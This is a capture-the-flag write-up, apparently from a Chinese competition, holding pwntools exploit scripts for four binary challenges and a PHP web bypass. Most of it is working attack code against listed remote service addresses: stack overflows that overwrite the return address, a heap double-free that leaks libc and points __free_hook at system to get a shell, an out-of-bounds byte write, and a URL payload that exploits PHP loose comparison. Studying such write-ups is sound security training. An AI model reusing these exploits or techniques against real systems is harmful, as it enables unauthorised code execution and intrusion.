M78
from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']

# Remote service for the "M78" challenge. The target is 32-bit: the libc path is
# under /lib/i386-linux-gnu and the address below is packed with p32().
p = remote("39.96.88.40",7010)
# Both ELF objects are loaded but never referenced in this script.
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
elf = ELF("./M78")
# Menu option 1, then a 25-byte answer to the "building" prompt, then wait for the
# "password" prompt before sending the real payload.
p.sendlineafter('?','1')
p.recvuntil("building\n")
p.send('a'*25)
p.recvuntil("password\n")

# 0x18 + 4 bytes of filler followed by a 4-byte little-endian address inside ./M78.
# NOTE(review): presumably 0x18 is the buffer size and the extra 4 bytes the saved
# frame pointer; what 0x08049202 is in the binary is not shown here - confirm with
# a disassembler before reusing.
payload = 'b'*(0x18+0x4)+p32(0x08049202)
# Pad the message to exactly 0x107 bytes (presumably the size the service reads).
payload = payload.ljust(0x107,'a')
p.send(payload)

p.interactive()
 
game
from pwn import *

context.log_level = "debug"
context.terminal = ['tmux','sp','-h']

# Remote service for the "game" challenge (64-bit: the payload uses p64()).
p = remote("39.96.88.40",7040)
# 36 filler bytes followed by an 8-byte zero.
# NOTE(review): why the 36-byte offset and the trailing zero are needed is not
# visible here - tie this to the binary's stack layout before reusing.
payload = 'a'*36
payload += p64(0)
# One answer per ":" prompt, sent in this order after the payload.
num = [55,15,82,1,0x62,0x44,0x43,0xf,0x56,0x3]

p.recvuntil("is :")
p.send(payload)
for i in num:
    p.recvuntil(":")
    p.sendline(str(i))

p.interactive()
 
Box
from pwn import *
context.terminal=['tmux','sp','-h']


# Remote service for the "Box" challenge.
p = remote("39.96.88.40",7020)
# libc.so.6 shipped with the challenge; its symbol table supplies the 'system'
# and '__free_hook' offsets used later in the script.
libc = ELF("./libc.so.6")
# elf is loaded but not referenced anywhere in this script.
elf = ELF("./pwn")
 
def _menu(choice, *fields):
    """Pick menu option *choice* at the ">> " prompt, then answer each ":\n" prompt
    with the given fields, sent as text with a trailing newline."""
    p.sendlineafter(">> ", choice)
    for value in fields:
        p.sendlineafter(":\n", str(value))


def add(id, size, content='a'):
    """Menu 1: create chunk *id* of *size* bytes, then send *content* as its data
    (raw send, no newline appended)."""
    _menu('1', id, size)
    p.sendafter(":\n", content)


def show(id):
    """Menu 4: ask the service to print chunk *id*."""
    _menu('4', id)


def delete(id):
    """Menu 3: free chunk *id*."""
    _menu('3', id)


def edit(id, content):
    """Menu 2: overwrite chunk *id* with *content* (raw send, no newline)."""
    _menu('2', id)
    p.sendafter(":\n", content)
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
# Chunk 0 is large (0x200); chunk 1 is small (0x68).
add(0,0x200)
add(1,0x68)
# delete() is called on the same id eight times in a row, so the service evidently
# does not invalidate an entry after freeing it (a double-free bug). show(0) then
# prints the freed chunk, whose first bytes now hold an allocator pointer.
for _ in range(7):
    delete(0)
delete(0)
show(0)
# Take the 6 bytes ending in 0x7f as a little-endian pointer and subtract 96; the
# log label says the result is treated as main_arena. Both 96 and 0x3ebc40 are
# build-specific constants tied to ./libc.so.6.
leak_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-96
log.info("main_arean:"+hex(leak_addr))
libc_base = leak_addr - 0x3ebc40
log.info("libc_base:"+hex(libc_base))
system_addr = libc_base + libc.sym['system']
log.info("system_addr:"+hex(system_addr))
free_hook = libc_base + libc.sym['__free_hook']
log.info("free_hook:"+hex(free_hook))
# Python 2 idiom (.next()); binsh_str is computed but never used below.
binsh_str = libc_base + libc.search('/bin/sh').next()
# Same double free on chunk 1, then three allocations of the same size: the first
# writes free_hook into the freed chunk's data, the third is expected to be handed
# out at free_hook itself and receives system_addr.
# NOTE(review): this relies on the allocator reusing the freed chunk's forward
# pointer; confirm against the glibc version in ./libc.so.6.
delete(1)
delete(1)
add(2,0x68,p64(free_hook))
add(3,0x68,"/bin/sh\x00")
add(4,0x68,p64(system_addr))

# Freeing chunk 3 triggers the hook with that chunk's data as the argument.
delete(3)
p.interactive()
 
碰碰碰
爆破 canary,主办方已下架该题目。
Num
from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']

# Remote service for the "Num" challenge (32-bit: the address below is 4 bytes).
p = remote("39.96.88.40",7030)
# elf is loaded but never referenced in this script.
elf = ELF("./NUM")
# Answer the first "?" prompt with the element count 10.
p.recvuntil("?\n")
p.sendline(str(10))

# Fill the ten entries with 0..9. The sleep presumably paces the sends so that no
# prompt is skipped.
p.recvuntil("NUM\n")
for i in range(10):
    sleep(0.2)
    p.sendline(str(i))
# Address inside ./NUM. It is not referenced directly below: the four writes spell
# out its little-endian bytes 0xb2 0x91 0x04 0x08 by hand - keep them in sync if
# this value changes.
shell = 0x080491B2

# Each group is: menu option 3, an index, then a byte value. The indices 132..135
# lie beyond the 10 entries entered above.
# NOTE(review): presumably an unchecked index that reaches the saved return
# address; confirm the layout in the binary. (str('3') is redundant: it is already a string.)
p.recvuntil("?\n")
p.sendline(str('3'))
p.recvuntil("?\n")
p.sendline(str(112+4+16))
p.recvuntil(':\n')
p.sendline(str(0xb2))
p.recvuntil("?\n")
p.sendline(str('3'))
p.recvuntil("?\n")
p.sendline(str(113+4+16))
p.recvuntil(':\n')
p.sendline(str(0x91))
p.recvuntil("?\n")
p.sendline(str('3'))
p.recvuntil("?\n")
p.sendline(str(114+4+16))
p.recvuntil(':\n')
p.sendline(str(0x04))
p.recvuntil("?\n")
p.sendline(str('3'))
p.recvuntil("?\n")
p.sendline(str(115+4+16))
p.recvuntil(':\n')
p.sendline(str(0x08))
# Menu option 5 - presumably the exit/return path, after which the rewritten
# address takes effect.
p.sendline(str(5))
p.interactive()
 
Web01
源码泄露:http://39.96.91.106:7040/code/code.txt
<?php <p>code.txt</p>
// NOTE(review): the "<p>code.txt</p>" fragment above is most likely page chrome
// captured together with the listing; as written it is not valid PHP.
if (isset ($_GET['password'])) {
    // BUG: preg_match() returns int 0 on no match and FALSE only on error, so the
    // strict `=== FALSE` comparison never fires and the alphanumeric check is dead
    // code. The intended guard is `!== 1` (or `=== 0` for an explicit no-match).
    if (preg_match ("/^[a-zA-Z0-9]+$/", $_GET['password']) === FALSE)
    {
        echo '<p>You password must be alphanumeric</p>';
    }
    // `$_GET['password'] > 9999999` is PHP's loose string-to-number comparison, so
    // a short string with a numeric prefix (e.g. scientific notation) can exceed the
    // bound while staying under 8 characters. Validate and cast to int first, then
    // compare integers.
    else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
    {
        // $flag is not defined in this listing; presumably set elsewhere.
        if (strpos ($_GET['password'], '*-*') !== FALSE)
        {
            die('Flag: ' . $flag);
        }
        else
        {
            echo('<p>*-* have not been found</p>');
        }
    }
    else
    {
        echo '<p>Invalid password</p>';
    }
}
?>
 
`if (preg_match ("/^[a-zA-Z0-9]+$/", $_GET['password']) === FALSE)` 这个正则检查的分支永远不会进入:preg_match 不匹配时返回 int 0,而 FALSE 是 bool 型,用全等(===)比较时二者不相等。
`else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)` 这一步用科学计数法绕过长度和大小的限制,然后再加上 *-*。
exp
http://39.96.91.106:7040/?password=2e9*-*